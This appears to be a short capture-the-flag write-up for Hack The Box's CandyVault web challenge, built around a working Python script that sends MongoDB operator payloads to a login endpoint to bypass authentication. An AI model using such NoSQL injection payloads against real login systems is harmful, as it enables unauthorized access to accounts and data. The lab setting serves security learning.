Post

HackTheBox CandyVault Challenge

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the CandyVault Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/624

Description

The malevolent spirits have concealed all the Halloween treats within their secret vault, and it’s imperative that you decipher its enigmatic seal to reclaim the candy before the spooky night arrives.

Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

#!/usr/bin/python3
from requests.exceptions import ConnectionError
import requests,json,sys

def get_base_url():
    if len(sys.argv)!=2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host,port=sys.argv[1].split(':')
    return f"http://{host}:{port}"

def attempt_login(payload):
    for _ in range(3):
        try:
            response=session.post(login_url,headers=headers,json=payload,allow_redirects=False)
            if response.is_redirect:
                final_url=response.headers.get("Location")
                if final_url.startswith("/"):final_url=base_url+final_url
                response=session.get(final_url,headers=headers)
                return response,final_url
            return response,None
        except ConnectionError:pass
    return None,None

def attack():
    for payload in payloads:
        response,final_url=attempt_login(payload)
        if response and "Log-in to open the doors to candy vault!" not in response.text:
            print(response.text);return
        
base_url=get_base_url()
login_url=f"{base_url}/login"
headers={"Content-Type":"application/json","User-Agent":"Mozilla/5.0"}
session=requests.Session();payloads=[{"email":{"$ne":None},"password":{"$exists":True}}]
attack()

Summary

CandyVault is a very-easy-level challenge on Hack The Box that exploits a NoSQL injection vulnerability in the login functionality. By crafting various payloads targeting the email and password fields, the script attempts to bypass authentication using MongoDB query operators. Successful payloads allow access to restricted areas, exposing the flag. This challenge highlights the risks of unsanitized inputs and weak database query protections in NoSQL applications.

challenge
htb challenge writeup linux web sqli
This post is licensed under CC BY 4.0 by the author.